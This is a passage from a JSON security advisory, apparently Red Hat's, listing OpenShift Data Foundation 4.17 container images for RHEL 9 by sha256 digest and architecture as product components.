},
"product_reference": "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le"
},
"product_reference": "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64"
},
"product_reference": "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x"
},
"product_reference": "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
